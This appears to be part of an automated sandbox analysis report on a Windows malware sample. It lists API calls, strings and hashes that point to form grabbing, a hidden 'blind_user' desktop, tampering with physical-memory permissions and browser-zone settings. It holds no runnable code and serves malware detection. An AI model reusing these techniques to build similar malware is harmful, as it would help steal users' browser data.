                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • yes, xrefs: 0040510E
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • 1601, xrefs: 004050D4
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • GlobalUserOffline, xrefs: 004050FA
                            • BrowseNewProcess, xrefs: 00405113
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                             Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                             Joe Sandbox IDA Plugin
                             • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
